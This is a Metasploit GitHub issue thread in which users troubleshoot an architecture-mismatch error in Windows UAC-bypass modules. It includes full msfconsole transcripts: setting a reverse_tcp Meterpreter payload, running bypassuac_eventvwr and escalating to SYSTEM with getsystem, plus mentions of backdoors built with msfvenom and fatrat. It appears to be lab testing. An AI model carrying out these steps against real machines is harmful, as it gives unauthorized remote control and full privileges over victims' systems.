Anonymousismyname commented 7 years ago

when i use bypassuac_injection i get an error "Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System" i also changed the target,migrated between x86 and x64 process.but i still get this error

and i use "run"after setting all of the parameters instead of "exploit" since that doesnt even work when. what im i doing wrong?

OJ commented 7 years ago

For this to work you need to make sure that all of the following match:

System architecture (ie. the arch of the system you're running on).
Meterpreter architecture (ie. the current meterpreter session you'll run the exploit through).
Payload architecture (ie. the PAYLOAD setting in the exploit module).
Target architecture (ie. the TARGET setting in the exploit module).

If they all match, it should work fine.

Anonymousismyname commented 7 years ago

Im running 64bit parrot os on vbox. I think all are 64 bit. I dont know about payload arch. Do you mean the payload i used to exploit? Then i used fatrat pwnwind. Im not sure if it is x64.

Anonymousismyname commented 7 years ago

Im getting same error even if i use x64 payload, x64 process and x64 target!

void-in commented 7 years ago

@Anonymousismyname The parrot os is your attacker machine. It doesn't matter what arch it is. What OJ said above is that if your target machine i.e. the Windows is x64, then:

Then the current meterpreter session should be x64 (migrate into an x64 process)
The PAYLOAD configured with the UAC bypass module should be x64 (e.g. set PAYLOAD windows/x64/meterpreter/reverse_tcp
Set the exploit target to x64 (show targets, it will display the targets. Use 1 or 2)

Replace all of the above for x86 if you are targeting an x86 arch Windows.

Anonymousismyname commented 7 years ago

Believe me i did the exact same. Used x64 payload. Migrated to a x64 process. And set the target to x64 windows.i even did the opposite. Made a x86 payload, and was in x86 process and set the target to x86 windows. I get the same error!

void-in commented 7 years ago

I am testing with the latest git pull snapshot.

meterpreter > sysinfo
Computer        : MSF-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(bypassuac_eventvwr) > use exploit/windows/local/bypassuac_eventvwr
msf exploit(bypassuac_eventvwr) > show options

Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf exploit(bypassuac_eventvwr) > set SESSION 1
SESSION => 1
msf exploit(bypassuac_eventvwr) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64

msf exploit(bypassuac_eventvwr) > set TARGET 1
TARGET => 1
msf exploit(bypassuac_eventvwr) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(bypassuac_eventvwr) > set LHOST x.x.x.x
LHOST => x.x.x.x
msf exploit(bypassuac_eventvwr) > set LPORT 443
LPORT => 443
msf exploit(bypassuac_eventvwr) > exploit

[*] Started reverse TCP handler on x.x.x.x:443
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\eventvwr.exe
[*] Sending stage (1189423 bytes) to y.y.y.y
[*] Meterpreter session 2 opened (x.x.x.x:443 -> y.y.y.y:4598) at 2017-02-08 10:28:28 +0500
[*] Cleaining up registry keys ...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

As you can see, I am not able to reproduce it. The target machine is a 64-bit Windows 7.

Anonymousismyname commented 7 years ago

i also did try bypassuac_eventvwr before,it returned me to command prompt and when i typed whoimi it showed the "username of the user" not "NT AUTHORITY\SYSTEM". and im trying bypassuac_injection which stops at "Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System" my meterpreter session is x64,and process as well as target. tho it works in x86 windows when i used simple payload(not windows/x64/meterpreter/reverse_tcp) and was (obviously in x86 process)

Anonymousismyname commented 7 years ago

i tried again im in x64 process<---------------------------------------------------------------------------------------- meterpreter > ps

Process List

PID PPID Name Arch Session User Path

0 0 [System Process]
4 0 System
312 4 smss.exe
380 436 conhost.exe x64 1
388 380 csrss.exe
424 380 wininit.exe
436 416 csrss.exe
460 416 winlogon.exe
504 424 services.exe
520 424 lsass.exe
528 424 lsm.exe
648 504 svchost.exe
720 504 VBoxService.exe
772 504 svchost.exe
820 504 svchost.exe
872 504 svchost.exe
952 504 svchost.exe
980 504 svchost.exe
1128 504 svchost.exe
1220 504 AvastSvc.exe
1272 952 dwm.exe x64 1 username-PC\username C:\Windows\system32\Dwm.exe 1288 1264 explorer.exe x64 1 username-PC\username C:\Windows\Explorer.EXE 1428 1288 VBoxTray.exe x64 1 username-PC\username C:\Windows\System32\VBoxTray.exe 1476 1664 mmc.exe x64 1
1528 504 spoolsv.exe
1580 504 taskhost.exe x64 1 username-PC\username C:\Windows\system32\taskhost.exe 1644 504 svchost.exe
1792 1468 avastui.exe x86 1 username-PC\username C:\Program Files\AVAST Software\Avast\avastui.exe 1816 504 SearchIndexer.exe
1968 504 svchost.exe
2396 504 svchost.exe
2596 504 wmpnetwk.exe
2708 504 BitCometService.exe
3144 436 conhost.exe x64 1 username-PC\username C:\Windows\system32\conhost.exe 3404 3524 powershell.exe x86 1 username-PC\username C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe 3420 3856 powershell.exe x86 1
3964 4068 BitComet.exe x64 1 username-PC\username C:\Program Files\BitComet\BitComet.exe

meterpreter > getuid Server username: username-PC\username meterpreter > getpid Current pid: 3964<-----------------------------------------------------------------------------------

my payload (i tried exitfunc as process too)<-------------------------------------------------------------------------

msf exploit(bypassuac_eventvwr) > show options

Module options (exploit/windows/local/bypassuac_eventvwr):

Name Current Setting Required Description

SESSION 5 yes The session to run this module on.

Payload options (windows/x64/meterpreter/reverse_tcp):<-----------------------------------------------

Name Current Setting Required Description

EXITFUNC seh yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.105 yes The listen address LPORT 4444 yes The listen port

Exploit target:

Id Name

1 Windows x64

sysinfo<---------------------------------------------------------------------------------------- meterpreter > sysinfo Computer : USERNAME-PC OS : Windows 7 (Build 7600). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > and i created exploit payload x64------------------------------ msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH / no The URI to use for this exploit (default is random)

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.105 yes The listen address LPORT 4444 yes The listen port

Exploit target:

Id Name

2 PSH

but still i cant get a session

msf exploit(bypassuac_eventvwr) > run

[] Started reverse TCP handler on 192.168.0.105:4444 [] UAC is Enabled, checking level... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [] Configuring payload and stager registry keys ... [] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\eventvwr.exe [] Cleaining up registry keys ... [] Exploit completed, but no session was created.

OJ commented 7 years ago

I've tested both of these modules locally, on x64 and x86 and I'm not getting the same problem as you.

When you use either of these modules, you'll get a new session that is running as the user, not as SYSTEM. But, the session should be elevated, so getsystem should give you the SYSTEM token. I'm not sure why you're using web delivery here when it isn't needed.

Are you doing this in a Lab environment?

Anonymousismyname commented 7 years ago

I wasn't even able to produce a session. Let me try once more. I was just testing it. No im testing it in vbox.

Anonymousismyname commented 7 years ago

Hey it works on a normal backdoor, which is created by msfvenom. I think the fatrat had a x86 payload. But it also did not work with web_delivery.

Anonymousismyname commented 7 years ago

Im closing this since it is solved. U need to make sure ur payload of the created backdoor be x64.use own created backdoor.

mirage-F commented 7 months ago

Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets I GOT the same error

any idea to help

rapid7 / metasploit-framework

bypassuac_injection returns {Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System} #7926

Process List